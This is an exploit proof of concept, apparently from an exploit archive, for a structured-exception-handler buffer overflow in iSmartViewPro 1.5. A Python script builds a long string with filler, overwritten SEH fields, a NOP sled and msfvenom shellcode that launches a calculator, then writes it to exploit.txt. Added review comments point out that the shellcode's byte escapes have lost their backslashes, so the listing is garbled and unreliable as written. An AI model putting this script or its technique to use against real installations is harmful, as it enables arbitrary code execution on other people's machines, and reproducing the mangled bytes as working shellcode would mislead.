# Exploit Title: iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow (SEH)
# Author: Gionathan "John" Reale
# Discovery Date: 2018-09-07
# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
# Tested Version: 1.5
# Tested on OS: Windows 7 32bit
# Steps to Reproduce:
# Run the Python exploit script; it will create a new file named
# "exploit.txt". Copy the text inside "exploit.txt", start the
# iSmartViewPro 1.5 program, click on "System Setup" and go to the
# "Save Path for Snapshot and Record file" field. Paste the content of
# "exploit.txt" and click on Save. A calculator will pop up.

#!/usr/bin/python

# Assemble the proof-of-concept string that the header says is pasted into
# the "Save Path for Snapshot and Record file" field. Layout, in order:
# filler, NSEH, SEH, NOP run, payload, trailing pad.
# NOTE(review): the byte escapes in this listing appear to have lost their
# backslashes, so the literals below are plain ASCII text as written; with
# that, len(nops) alone exceeds 6384 and `pad` evaluates to an empty string.
# Defensive context: overwriting an SEH record from a long input field is
# the pattern SafeSEH, SEHOP and DEP are meant to stop; the underlying fix is
# a length check on the save-path input (root cause not shown in this file).

# 260 filler characters placed ahead of the SEH record fields; presumably
# the offset to that record (not verifiable from this file).
buffer = "A" * 260

# Value for the "next SEH" field of the overwritten record (name-based reading).
NSEH = "xebx06x90x90"

# Value for the handler field of the same record; what it refers to is not
# stated on the page.
SEH = "xdfx16x01x10"
# Run of 4000 repetitions of the NOP literal placed ahead of the payload.
nops = "x90" * 4000
# Bad characters listed by the author: x00x0ax0dx2f
# Payload generated with msfvenom; per the header its visible effect is that
# a calculator opens, i.e. a proof of code execution.
buf = ""
buf += "xbax9ax98xafx7exddxc2xd9x74x24xf4x5fx29"
buf += "xc9xb1x31x83xc7x04x31x57x0fx03x57x95x7a"
buf += "x5ax82x41xf8xa5x7bx91x9dx2cx9exa0x9dx4b"
buf += "xeax92x2dx1fxbex1exc5x4dx2bx95xabx59x5c"
buf += "x1ex01xbcx53x9fx3axfcxf2x23x41xd1xd4x1a"
buf += "x8ax24x14x5bxf7xc5x44x34x73x7bx79x31xc9"
buf += "x40xf2x09xdfxc0xe7xd9xdexe1xb9x52xb9x21"
buf += "x3bxb7xb1x6bx23xd4xfcx22xd8x2ex8axb4x08"
buf += "x7fx73x1ax75xb0x86x62xb1x76x79x11xcbx85"
buf += "x04x22x08xf4xd2xa7x8bx5ex90x10x70x5fx75"
buf += "xc6xf3x53x32x8cx5cx77xc5x41xd7x83x4ex64"
buf += "x38x02x14x43x9cx4fxcexeax85x35xa1x13xd5"
buf += "x96x1exb6x9dx3ax4axcbxffx50x8dx59x7ax16"
buf += "x8dx61x85x06xe6x50x0exc9x71x6dxc5xaex8e"
buf += "x27x44x86x06xeex1cx9bx4ax11xcbxdfx72x92"
buf += "xfex9fx80x8ax8ax9axcdx0cx66xd6x5exf9x88"
buf += "x45x5ex28xebx08xccxb0xc2xafx74x52x1b"
# Trailing filler sized so the whole string totals 6384 characters; a
# negative count makes the multiplication yield an empty string.
pad = "B" * (6384 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )

# Concatenate the pieces in the order they are meant to appear in the field.
payload = buffer + NSEH + SEH + nops + buf + pad
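# Write the assembled string to exploit.txt in the working directory.
# `payload` is built by the statements above this block.
try:
    # The context manager closes the handle even if write() raises.
    with open("exploit.txt", "w") as f:
        # Parenthesised single-argument print runs on Python 2 and 3 alike.
        print("[+] Creating %s bytes evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except (IOError, OSError):
    # Only file-system failures are expected here; a bare except would also
    # hide KeyboardInterrupt and programming errors such as NameError.
    print("File cannot be created")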